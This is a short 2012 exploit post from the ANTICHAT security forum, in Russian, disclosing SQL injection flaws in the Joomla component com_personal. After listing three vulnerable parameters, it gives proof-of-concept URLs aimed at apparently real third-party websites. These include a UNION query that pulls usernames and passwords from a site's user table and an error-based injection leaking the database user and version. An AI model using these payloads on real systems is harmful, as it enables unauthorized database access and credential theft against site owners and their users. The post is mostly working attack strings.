ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Joomla com_personal Multiple SQL-inj Vuln

# Date: 18.02.2012

# Author: Mach1ne

Множественные уязвимые параметры:

http://localhost/[PATH/index.php?option=com_personal&view=detalle&trbId=[SQL]

http://localhost/[PATH]/index.php?option=com_personal&view=personal&grupo_id=[SQL]

http://localhost/[PATH]/index.php?option=com_personal&id=[SQL]



PoC:

http://www.ceit.es/index.php?option=com_personal&view=detalle&trbId=-2828+UNION+ALL+SELECT+NULL,VERSION(),NULL,NULL,NUL L,NULL,NULL--&catId=91&prsId=1&Itemid=25&lang=en

http://www.ciberes.org/index.php?option=com_personal&view=personal&grupo_ id=4+union+all+select+1,concat(username,0x3a,passw ord),3,4,5,6,7,8,9,10,11+from+ciber_users--+&Itemid=77

http://www.cerpamid.co.cu/index.php?option=com_personal&id=65+AND+(SELECT+65 86+FROM(SELECT+COUNT(*),CONCAT(user(),(version()), FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACT ER_SETS+GROUP%20BY+x)a)&actived=1&active=1&lang=en